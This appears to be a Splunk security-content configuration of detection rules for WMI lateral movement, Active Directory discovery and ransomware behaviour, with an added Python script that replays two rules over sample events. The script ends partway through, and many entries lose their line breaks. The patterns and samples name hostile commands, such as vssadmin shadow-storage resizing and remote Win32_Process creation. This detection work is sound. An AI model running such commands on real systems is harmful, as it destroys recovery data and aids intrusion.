action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote Process Instantiation via WMI and PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` leveraging the `Invoke-WmiMethod` commandlet complemented with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and `powershell.exe` for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via WMI and PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-WmiMethod*" AND Processes.process="*-CN*" AND Processes.process="*-Class Win32_Process*" AND Processes.process="*-Name create*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_and_powershell_filter`

[ESCU - Remote Process Instantiation via WMI and PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Invoke-WmiMethod` commandlet with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and this commandlet for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Invoke-WmiMethod` commandlet with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and this commandlet for lateral movement and remote code execution.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found at https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators may leverage WMI and powershell.exe to start a process on remote systems, but this activity is usually limited to a small set of hosts or users.
action.escu.creation_date = 2022-11-15
action.escu.modification_date = 2022-11-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Process Instantiation via WMI and PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = A process was started on a remote endpoint from $Computer$ by abusing WMI using PowerShell.exe
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote Process Instantiation via WMI and PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Invoke-WmiMethod` commandlet with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and this commandlet for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via WMI and PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText="*Invoke-WmiMethod*" AND (ScriptBlockText="*-CN*" OR ScriptBlockText="*-ComputerName*") AND ScriptBlockText="*-Class Win32_Process*" AND ScriptBlockText="*-Name create*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_and_powershell_script_block_filter`

[ESCU - Remote System Discovery with Adsisearcher - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain computers. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain computers. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found at https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use Adsisearcher for troubleshooting.
action.escu.creation_date = 2022-06-29
action.escu.modification_date = 2022-06-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote System Discovery with Adsisearcher - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Remote system discovery enumeration on $Computer$ by $user$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote System Discovery with Adsisearcher - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain computers. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain computers for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = Remote System Discovery with Adsisearcher
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*adsisearcher*" AND ScriptBlockText = "*objectcategory=computer*" AND ScriptBlockText IN ("*findAll()*","*findOne()*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_system_discovery_with_adsisearcher_filter`

[ESCU - Remote System Discovery with Dsquery - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover remote systems. The `computer` argument returns a list of all computers registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover remote systems. The `computer` argument returns a list of all computers registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-31
action.escu.modification_date = 2021-08-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote System Discovery with Dsquery - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote System Discovery with Dsquery - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe") (Processes.process="*computer*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_system_discovery_with_dsquery_filter`

[ESCU - Remote System Discovery with Net - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to discover remote systems. The argument `domain computers /domain` returns a list of all domain computers. Red Teams and adversaries alike use net.exe to identify remote systems for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to discover remote systems. The argument `domain computers /domain` returns a list of all domain computers. Red Teams and adversaries alike use net.exe to identify remote systems for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-30
action.escu.modification_date = 2021-08-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote System Discovery with Net - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery", "IcedID"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote System Discovery with Net - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") ((Processes.process="*domain computers*" AND Processes.process=*/do*) OR (Processes.process="*view*" AND Processes.process=*/do*)) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_system_discovery_with_net_filter`

[ESCU - Remote System Discovery with Wmic - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command return a list of all the systems registered in the domain. Red Teams and adversaries alike may leverage WMI and wmic.exe to identify remote systems for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command return a list of all the systems registered in the domain. Red Teams and adversaries alike may leverage WMI and wmic.exe to identify remote systems for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-09-01
action.escu.modification_date = 2021-09-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote System Discovery with Wmic - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Remote system discovery enumeration on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote System Discovery with Wmic - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command return a list of all the systems registered in the domain. Red Teams and adversaries alike may leverage WMI and wmic.exe to identify remote systems for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = Remote System Discovery with Wmic action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_computer* AND Processes.process="*GET ds_samaccountname*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_system_discovery_with_wmic_filter` [ESCU - Remote WMI Command Attempt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies usage of `wmic.exe` spawning a local or remote process, identified by the `node` switch. During triage, review parallel processes for additional commands executed. Look for any file modifications before and after `wmic.exe` execution. In addition, identify the remote endpoint and confirm execution or file modifications. Contain and isolate the endpoint as needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies usage of `wmic.exe` spawning a local or remote process, identified by the `node` switch. During triage, review parallel processes for additional commands executed. Look for any file modifications before and after `wmic.exe` execution. In addition, identify the remote endpoint and confirm execution or file modifications. 
Contain and isolate the endpoint as needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may use this legitimately to gather info from remote systems. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote WMI Command Attempt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Graceful Wipe Out Attack", "Volt Typhoon", "Living Off The Land", "IcedID", "Suspicious WMI Use", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = A wmic.exe process $process_name$ with command line $process$ containing the node switch was run on host $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote WMI Command Attempt - Rule action.correlationsearch.annotations = {"analytic_story": ["Graceful Wipe Out Attack", "Volt Typhoon", "Living Off The Land", "IcedID", "Suspicious WMI Use", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies usage of `wmic.exe` spawning a local or remote process, identified by the `node` switch. During triage, review parallel processes for additional commands executed. Look for any file modifications before and after `wmic.exe` execution. In addition, identify the remote endpoint and confirm execution or file modifications. Contain and isolate the endpoint as needed. action.notable.param.rule_title = Remote WMI Command Attempt action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process=*node* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_wmi_command_attempt_filter` [ESCU - Resize ShadowStorage volume - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the resizing of shadow storage, a technique ransomware uses so that existing shadow copies are purged and new ones cannot be retained. Attackers use it as an alternative to deleting the shadow copies outright, which is a well-known alert for defensive teams. One example is Clop ransomware, which drops a .bat file that resizes the shadow storage to the smallest size possible.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the resizing of shadow storage, a technique ransomware uses so that existing shadow copies are purged and new ones cannot be retained. Attackers use it as an alternative to deleting the shadow copies outright, which is a well-known alert for defensive teams. One example is Clop ransomware, which drops a .bat file that resizes the shadow storage to the smallest size possible. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators can resize shadow storage for legitimate purposes.
action.escu.creation_date = 2021-03-12 action.escu.modification_date = 2021-03-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Resize ShadowStorage volume - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Clop Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A process $parent_process_name$ attempted to resize shadow storage with command line $process$ on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Resize ShadowStorage volume - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the resizing of shadow storage, a technique ransomware uses so that existing shadow copies are purged and new ones cannot be retained. Attackers use it as an alternative to deleting the shadow copies outright, which is a well-known alert for defensive teams. One example is Clop ransomware, which drops a .bat file that resizes the shadow storage to the smallest size possible.
action.notable.param.rule_title = Resize ShadowStorage volume action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as cmdline values(Processes.parent_process_name) as parent_process values(Processes.process_name) as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name = "cmd.exe" OR Processes.parent_process_name = "powershell.exe" OR Processes.parent_process_name = "powershell_ise.exe" OR Processes.parent_process_name = "wmic.exe" Processes.process_name = "vssadmin.exe" Processes.process="*resize*" Processes.process="*shadowstorage*" Processes.process="*/maxsize*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `resize_shadowstorage_volume_filter` [ESCU - Revil Common Exec Parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies suspicious command-line parameters commonly used by REvil ransomware when encrypting a compromised machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies suspicious command-line parameters commonly used by REvil ransomware when encrypting a compromised machine.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Third-party tools may use the same command-line parameters as REvil ransomware. action.escu.creation_date = 2021-06-02 action.escu.modification_date = 2021-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Revil Common Exec Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware"] action.risk = 1 action.risk.param._risk_message = A process $process_name$ with command line $process$ related to REvil ransomware was run on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Revil Common Exec Parameter - Rule action.correlationsearch.annotations =
{"analytic_story": ["Ransomware", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies suspicious command-line parameters commonly used by REvil ransomware when encrypting a compromised machine. action.notable.param.rule_title = Revil Common Exec Parameter action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "* -nolan *" OR Processes.process = "* -nolocal *" OR Processes.process = "* -fast *" OR Processes.process = "* -full *" by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `revil_common_exec_parameter_filter` [ESCU - Revil Registry Entry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious registry modification that malware uses to store data about its infection. This technique is seen in several APT implants, malware families and ransomware such as REvil, which stores information like the randomly generated extension appended to every encrypted file and the file name of the ransom note on the compromised host.
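The Resize ShadowStorage volume and Revil Common Exec Parameter searches above both reduce to SPL wildcard literals applied to the command line, the first additionally gated on the parent process name. The Python below is an added example written for this page, not ESCU or Splunk code: it translates those wildcard literals into regular expressions and runs both rules over a handful of constructed process events whose field names follow the searches' BY clauses (dest, user, parent_process_name, process_name, process). It also makes one caveat concrete: in a literal such as "* -fast *" the surrounding spaces are part of the match, so a switch at the very end of a command line is not caught.

```python
"""Added example (not ESCU code): replays the 'Resize ShadowStorage volume' and
'Revil Common Exec Parameter' matching logic over constructed process events,
using the same wildcard literals the two searches use."""
import re
from collections import Counter

# Constructed Endpoint.Processes rows; field names follow the searches' BY clauses.
EVENTS = [
    {"dest": "ws01", "user": "CORP\\alice", "parent_process_name": "cmd.exe",
     "process_name": "vssadmin.exe",
     "process": "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"},
    # Same command, but launched from explorer.exe: outside the parent allowlist.
    {"dest": "ws01", "user": "CORP\\alice", "parent_process_name": "explorer.exe",
     "process_name": "vssadmin.exe",
     "process": "vssadmin Resize ShadowStorage /For=D: /On=D: /MaxSize=UNBOUNDED"},
    # Unknown binary with two REvil-style switches, the last one at end of line.
    {"dest": "ws02", "user": "CORP\\bob", "parent_process_name": "explorer.exe",
     "process_name": "payload.exe", "process": "payload.exe -nolan -fast"},
    # Third-party backup tool sharing a switch name: the documented false positive.
    {"dest": "ws03", "user": "CORP\\carol", "parent_process_name": "svchost.exe",
     "process_name": "backup.exe", "process": "backup.exe -full -path C:\\data"},
]


def spl_wildcard(pattern):
    """Translate an SPL wildcard literal such as "* -fast *" into a regex.
    '*' matches any run of characters; everything else, spaces included, is literal.
    Matching is case-insensitive here."""
    return re.compile("^" + ".*".join(map(re.escape, pattern.split("*"))) + "$",
                      re.IGNORECASE | re.DOTALL)


# Literals copied from the two searches.
SHADOWSTORAGE_PARENTS = {"cmd.exe", "powershell.exe", "powershell_ise.exe", "wmic.exe"}
SHADOWSTORAGE_PATTERNS = ["*resize*", "*shadowstorage*", "*/maxsize*"]   # all must match
REVIL_PATTERNS = ["* -nolan *", "* -nolocal *", "* -fast *", "* -full *"]  # any may match


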